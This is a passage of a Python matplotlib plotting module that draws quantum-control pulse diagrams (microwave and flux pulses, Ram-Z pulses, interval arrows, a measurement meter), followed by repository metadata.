envNeg = -amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2)
if modulation == 'normal':
mod = envPos * np.sin(2 * np.pi * 3 / width * x + phase)
elif modulation == 'high':
mod = envPos * np.sin(5 * np.pi * 3 / width * x + phase)
else:
raise ValueError()
ax.plot(x, envPos+y_offs, '--', color=color, **plot_kws)
ax.plot(x, envNeg+y_offs, '--', color=color, **plot_kws)
ax.plot(x, mod+y_offs, '-', color=color, **plot_kws)
if label is not None:
ax.text(pos + width / 2, labelHeight, label,
horizontalalignment='right', color=color)
return pos + width
def fluxPulse(ax, pos, y_offs=0, width=2.5, s=.1, amp=1.5, label=None, labelHeight=1.7,
color='C1', **plot_kws):
'''
Draw a smooth flux pulse, where the rising and falling edges are given by
Fermi-Dirac functions.
s: smoothness of edge
'''
x = np.linspace(pos, pos + width, 100)
y = amp / ((np.exp(-(x - (pos + 5.5 * s)) / s) + 1) *
(np.exp((x - (pos + width - 5.5 * s)) / s) + 1))
ax.fill_between(x, y+y_offs, color=color, alpha=0.3)
ax.plot(x, y+y_offs, color=color, **plot_kws)
if label is not None:
ax.text(pos + width / 2, labelHeight, label,
horizontalalignment='center', color=color)
return pos + width
def ramZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'):
'''
Draw a Ram-Z flux pulse, i.e. only part of the pulse is shaded, to indicate
cutting off the pulse at some time.
'''
xLeft = np.linspace(pos, pos + sep, 100)
xRight = np.linspace(pos + sep, pos + width, 100)
xFull = np.concatenate((xLeft, xRight))
y = amp / ((np.exp(-(xFull - (pos + 5.5 * s)) / s) + 1) *
(np.exp((xFull - (pos + width - 5.5 * s)) / s) + 1))
yLeft = y[:len(xLeft)]
ax.fill_between(xLeft, yLeft+y_offs, alpha=0.3, color=color, linewidth=0.0)
ax.plot(xFull, y+y_offs, color=color)
return pos + width
def modZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'):
'''
Draw a modulated Z pulse.
'''
return pos + width
def interval(ax, start, stop, y_offs = 0, height=1.5, label=None, labelHeight=None,
vlines=True, color='k', arrowstyle='<|-|>', **plot_kws):
'''
Draw an arrow to indicate an interval.
'''
if labelHeight is None:
labelHeight = height + 0.2
arrow = matplotlib.patches.FancyArrowPatch(
posA=(start, height+y_offs), posB=(stop, height+y_offs), arrowstyle=arrowstyle,
color=color, mutation_scale=7, **plot_kws)
ax.add_patch(arrow)
if vlines:
ax.plot([start, start], [0+y_offs, height+y_offs], '--', color=color, **plot_kws)
ax.plot([stop, stop], [0+y_offs, height+y_offs], '--', color=color, **plot_kws)
if label is not None:
ax.text((start + stop) / 2, labelHeight+y_offs, label, color=color,
horizontalalignment='center')
def interval_vertical(ax, start, stop, position, label=None, labelHeight=None,
color='k', arrowstyle='<|-|>', labeloffset: float = 0,
horizontalalignment='center'):
'''
Draw an arrow to indicate an interval.
'''
if labelHeight is None:
labelHeight = (start+stop)/2
arrow = matplotlib.patches.FancyArrowPatch(
posA=(position, start), posB=(position, stop), arrowstyle=arrowstyle,
color=color, mutation_scale=7)
ax.add_patch(arrow)
if label is not None:
ax.text(position+labeloffset, labelHeight, label, color=color,
horizontalalignment=horizontalalignment)
def meter(ax, x0, y0, y_offs=0, w=1.1, h=.8, color='black', fillcolor=None):
"""
Draws a measurement meter on the specified position.
"""
if fillcolor == None:
fill = False
else:
fill = True
p1 = matplotlib.patches.Rectangle(
(x0-w/2, y0-h/2+y_offs), w, h, facecolor=fillcolor, edgecolor=color,
fill=fill, zorder=5)
ax.add_patch(p1)
p0 = matplotlib.patches.Wedge(
(x0, y0-h/4+y_offs), .4, theta1=40, theta2=180-40, color=color, lw=2,
width=.01, zorder=5)
ax.add_patch(p0)
ax.arrow(x0, y0-h/4+y_offs, dx=.5*np.cos(np.deg2rad(70)),
dy=.5*np.sin(np.deg2rad(60)), width=.03, color=color, zorder=5)
| mit | -4,925,029,477,719,938,000 | 32.552147 | 89 | 0.585848 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.